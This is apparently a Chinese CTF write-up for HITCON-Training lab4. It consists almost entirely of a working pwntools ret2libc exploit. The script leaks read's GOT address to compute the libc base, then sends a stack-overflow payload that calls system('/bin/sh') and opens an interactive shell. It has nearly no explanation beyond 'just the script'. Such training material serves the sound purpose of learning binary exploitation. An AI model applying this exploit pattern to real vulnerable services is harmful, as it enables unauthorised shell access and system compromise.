HITCON-Training-master lab4 wp

简单的ret2libc，话不多说，直接上脚本
exp:

from pwn import*
context.log_level = "debug"
p = process('./ret2lib')
lib = ELF('/lib/i386-linux-gnu/libc.so.6')
elf = ELF('./ret2lib')


puts_plt = elf.symbols['puts']
read_got = elf.got['read']
read_plt = elf.plt['read']
main = elf.symbols['main']

binsh_lib = next(lib.search("/bin/sh"))
system_lib = lib.symbols['system']
read_lib = lib.symbols['read']

log.info("****************leak address****************")
p.recv()
p.sendline(str(read_got))
p.recvuntil("0x")
read_add = int(p.recv(8),16)

libc_base = read_add - read_lib
print "libc_base --> [%s]"%hex(libc_base)
system_add = libc_base + system_lib
print "system address -->[%s]"%hex(system_add)
binsh_add = libc_base + lib.search('/bin/sh').next()
print "binsh_add --> [%s]"%hex(binsh_add)

log.info("**************ret2libc*********************")
payload = 'a'*0x38 + 'bbbb' + p32(system_add) + p32(0xdeadbeef) + p32(binsh_add)
p.recv()
p.sendline(payload)
p.interactive()